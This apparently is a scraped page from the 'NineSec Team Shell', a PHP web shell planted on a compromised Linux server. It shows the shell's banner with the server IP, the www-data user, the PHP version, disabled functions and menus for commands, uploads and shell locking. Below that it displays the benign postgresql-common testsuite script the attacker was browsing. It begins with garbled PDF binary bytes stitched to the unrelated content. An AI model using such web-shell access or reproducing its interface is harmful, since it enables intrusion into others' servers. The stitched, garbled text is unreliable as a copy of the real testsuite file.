%PDF-1.3 %âãÏÓ 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream xœ¥\mo7þ ÿa?îâñH£ÑÌàŠyi{¹$EÚ(i?¬cÇÞÄkûürAþý‰½Žv·EÛízF¢HI|H‘Ô?¿{Ø|Z|X|÷Ýñó‡‡õÇËó³Å‡ã77Û?O¾Ýž¿__l®×››ëãßOàя77çwß¿xñêåâÅÉÓ'Ç?ªÅ°8ùôôI] µûgQ»ÔB©¦2zaà³]œlÝûÅ|üôôɇåÛ՟‹“?}òƒ£ " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress NineSec Team Shell
NineSec Team Shell
Server IP : 192.168.60.199  /  Your IP : 192.168.60.1
Web Server : Apache
System : Linux PROD-conference 6.8.12-17-pve #1 SMP PREEMPT_DYNAMIC PMX 6.8.12-17 (2025-11-21T11:16Z) x86_64
User : www-data ( 33)
PHP Version : 5.6.40-0+deb8u12
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/../run/../sbin/../usr/share/postgresql-common/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //home/../run/../sbin/../usr/share/postgresql-common/testsuite
#!/bin/sh

# Run integration tests (on the installed package). This happens on unshared
# tmpfses, so does not interfere with installed clusters.
#
# (C) 2005-2012 Martin Pitt <mpitt@debian.org>
# (C) 2012-2014 Christoph Berg <myon@debian.org>
#
#  This program is free software; you can redistribute it and/or modify
#  it under the terms of the GNU General Public License as published by
#  the Free Software Foundation; either version 2 of the License, or
#  (at your option) any later version.
#
#  This program is distributed in the hope that it will be useful,
#  but WITHOUT ANY WARRANTY; without even the implied warranty of
#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#  GNU General Public License for more details.

set -e

# default config
TESTSDIR="$(dirname $0)/t"
: ${PG_UMASKS="022 077"}

help ()
{
    echo "postgresql-common testsuite"
    echo "Syntax: $0 [options] [test ...]"
    echo "    -f number        run tests starting at this number"
    echo "    -i               install packages for versions specified by -v"
    echo "    -s               start a shell in the testbed on failure"
    echo "    -u 'umask ...'   umasks to run testsuite with [default: 022 077]"
    echo "    -v 'version ...' PostgreSQL versions to test [default: client versions installed]"
    exit ${1:-0}
}

# option parsing
while getopts "hf:isu:v:" opt ; do
    case $opt in
        f) FROM="$OPTARG" ;;
        i) INSTALL=1 ;;
        h) help ;;
        s) RUN_SHELL=1 ;;
        u) PG_UMASKS="$OPTARG" ;;
        v) export PG_VERSIONS="$OPTARG" ;; # used in t/TestLib.pm
        *) help 1 ;;
    esac
done

if [ "$(id -u)" != 0 ]; then
    echo "Error: this test suite needs to be run as root" >&2
    exit 1
fi

# install packages for versions specified by -v
# needs network for apt, so run before unshare
if [ "${INSTALL:-}" ] && [ -z "${UNSHARED:-}" ]; then
    for v in $PG_VERSIONS; do
        apt-get install -y postgresql-contrib-$v \
            postgresql-plperl-$v \
            postgresql-plpython-$v \
            postgresql-plpython3-$v \
            postgresql-pltcl-$v \
            postgresql-server-dev-$v
    done
    apt-get install -y libecpg-dev \
        locales \
        logrotate \
        procps \
        netcat-openbsd \
        hunspell-en-us
fi
# requirements on RedHat:
# perl-Test-Simple perl-Time-HiRes

# re-exec ourselves through unshare
if [ -z "$UNSHARED" ]; then
    UNSHARED=1 exec unshare -uimn -- "$0" "$@"
fi

# shift away args
shift $(($OPTIND - 1))

# use the local pgcommon.sh (either in the build tree or /usr/share/postgresql-common)
. ./pgcommon.sh

# install locales
locale_gen \
    en_US.UTF-8 UTF-8 \
    ru_RU ISO-8859-5 \
    ru_RU.UTF-8 UTF-8

# stop currently running clusters
if [ -x "/etc/init.d/postgresql" ]; then
    /etc/init.d/postgresql stop
fi

# let everything happen in overlay tmpfses to avoid interfering with already
# existing clusters; this also speeds up testing
mount --make-rprivate / 2> /dev/null || : # reset / to private mounts (systemd changes this to shared)
dirs="/etc/postgresql /etc/postgresql-common /var/lib/postgresql /var/log/postgresql /var/run/postgresql /dev/shm"
created_dirs=""
for d in $dirs; do
    if ! [ -d $d ]; then
        created_dirs="$created_dirs $d"
        mkdir -p $d
    fi
    mount -n -t tmpfs -o mode=755 tmpfs $d
done
# clean up created directories after us
cleanup () {
    umount $dirs
    if [ "$created_dirs" ]; then
        rmdir --ignore-fail-on-non-empty -p $created_dirs
    fi
}
trap "cleanup" 0 HUP INT QUIT ILL ABRT PIPE TERM
chown root:postgres /var/log/postgresql
chmod 1775 /var/log/postgresql
chown postgres:postgres /var/run/postgresql
chmod 2775 /var/run/postgresql
chmod 1777 /dev/shm

# the RPM packages enable the logging_collector by default, which the testsuite
# doesn't like. We disable it unconditionally here.
echo "logging_collector = off" >> /etc/postgresql-common/createcluster.conf

# reset core limit for pg_ctl tests
ulimit -S -c 0

# start localhost interface
if [ -x /bin/ip ]; then
    ip link set dev lo up || true
else
    ifconfig lo up || true
fi

# set environment
unset TMPDIR
unset LC_ALL
export LANG=en_US.utf8

# set variables which cause taint check errors
export IFS=' '
export CDPATH=/usr
export ENV=/nonexisting
export BASH_ENV=/nonexisting

if [ $# -eq 0 ]; then
    set -- $TESTSDIR/*.t
fi

for U in $PG_UMASKS; do
    case $U in
        022) TYPE="default" ;;
        077) TYPE="tight" ;;
        *) TYPE="custom" ;;
    esac

    echo "====== Running all tests with $TYPE umask $U ======="
    umask $U
    for T; do
        TBASE=${T##*/}
        [ "$FROM" ] && [ "${TBASE%%_*}" -lt "$FROM" ] && continue
        echo "=== Running test $TBASE ... ==="
        perl $T || {
            EXIT=$?
            if [ "${RUN_SHELL:-}" ]; then
                echo "*** $TBASE failed with status $EXIT, dropping you into a shell in the testbed ***"
                ${SHELL:-/bin/sh}
            fi
            exit $EXIT
        }
    done
done

NineSec Team - 2022